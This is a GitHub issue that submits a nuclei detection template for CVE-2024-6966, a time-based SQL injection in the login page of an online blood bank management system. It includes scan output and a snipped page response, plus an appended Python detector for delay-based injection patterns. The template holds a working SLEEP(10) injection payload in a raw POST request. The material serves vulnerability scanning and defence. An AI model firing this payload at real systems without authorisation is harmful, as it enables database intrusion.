projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

CVE-2024-6966 Online Blood Bank Management System - SQL Injection in Login Page #10393

Open cl4irv0yance opened 1 month ago

cl4irv0yance commented 1 month ago

Template Information:

In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.

References can be found here: https://nvd.nist.gov/vuln/detail/CVE-2024-6966 https://github.com/HermesCui/CVE/issues/1

Nuclei Template:

id: cve-2024-6966

info:
  name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
  author: cl4irv0yance
  description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.
  severity: High
  reference:
    - https://github.com/HermesCui/CVE/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: cve-2024-6966
  tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode

http:
  - raw:
      - |
        @timeout: 25s
        POST /bloodbank/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Username'
          - 'Password'
          - 'Keep me Signed in'
          - 'Forgot Password'
          - 'Wrong email or password'
        condition: and

      - type: dsl
        dsl:
          - 'duration>=10'

Template Results

nuclei -u https://test.site/bloodbank -t cve-2024-6966.yaml                                                                   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.9

                projectdiscovery.io

[INF] Current nuclei version: v3.2.9 (outdated)
[INF] Current nuclei-templates version: v9.9.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[cve-2024-6966] [http] [high] https://test.site/bloodbank/login.php

Page Response (only including html in response - snipped css)

HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 23:17:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5588
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[..SNIP..]

<div class="login-wrap">
  <div class="login-html">

  <form action="" method="post">
    <input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Login</label>
    <input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab"></label>

            <div class="login-form">
      <div class="sign-in-htm">
        <div class="group">
          <form action="home.php">
          <label for="user" class="label">Username</label>
          <input id="user" type="text" class="input" name="user">
        </div>
        <div class="group">
          <label for="pass" class="label">Password</label>
          <input id="pass" type="password" class="input" data-type="password" name="pass">
        </div>
        <div class="group">
          <input id="check" type="checkbox" class="check" checked>
          <label for="check"><span class="icon"></span> Keep me Signed in</label>
        </div>
        <div class="group">
          <input type="submit" style="background-color: green; color: white" class="button" name="sub" value="Log In">
        </div>
          <div class="group">
            <a href="forgot.php">Forgot Password</a>

      <script>alert('Wrong email or password')</script>         <div class="footer-left">
                <h3></span></h3>

             <div class="hr"></div>
        <div class="foot-lnk">
          <a href="forgot.html"></a>
        </div>
      </div>
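The template above detects the flaw from the request side by timing the response. The defensive counterpart, added here as an example that is not part of this issue or of the nuclei project, decodes a URL-encoded login body (the raw request from the template is reused as a constructed sample), reports any field carrying a time-delay primitive, and correlates the requested delay with the observed response time the way a WAF or SOC rule would. The pattern names, `fully_decode` and `find_time_based_sqli` are my own helpers, not anything from the project.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Time-delay primitives used by time-based blind SQL injection. Group 1 of each
# pattern captures the requested delay in seconds.
DELAY_PATTERNS = {
    "mysql_sleep": re.compile(r"\bSLEEP\s*\(\s*(\d+)", re.I),
    "mysql_benchmark": re.compile(r"\bBENCHMARK\s*\(\s*(\d+)", re.I),
    "pg_sleep": re.compile(r"\bPG_SLEEP\s*\(\s*(\d+)", re.I),
    "mssql_waitfor": re.compile(r"\bWAITFOR\s+DELAY\s+'(?:\d+:)*(\d+)'", re.I),
}

# Constructed sample: the POST body from the submitted template's raw request.
SAMPLE_BODY = (
    "tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT"
    "%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123"
    "%26sub%3DLog+In%22&pass=test&sub=Log+In"
)


def fully_decode(value: str, max_rounds: int = 4) -> str:
    """URL-decode until the string stops changing (bounded), so a payload that
    was itself encoded inside a form value is still inspected in clear text."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_time_based_sqli(form_body: str) -> list:
    """Scan every field of a URL-encoded body; return the fields that carry a
    time-delay primitive together with the delay they request."""
    findings = []
    for field, raw_value in parse_qsl(form_body, keep_blank_values=True):
        value = fully_decode(raw_value)
        for technique, pattern in DELAY_PATTERNS.items():
            match = pattern.search(value)
            if match:
                findings.append({"field": field, "technique": technique,
                                 "delay_seconds": int(match.group(1))})
    return findings


def is_consistent_with_delay(findings: list, response_seconds: float) -> bool:
    """Correlation a SOC rule would apply: a request that asks the database to
    sleep N seconds and then actually takes at least N seconds to answer is a
    strong indicator that the injected SQL executed."""
    return any(response_seconds >= f["delay_seconds"] for f in findings)
```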
princechaddha commented 3 weeks ago

Hello, the response time for this issue was longer than usual because the team was traveling for DEFCON. The team will respond to this issue shortly. Thank you for your contribution.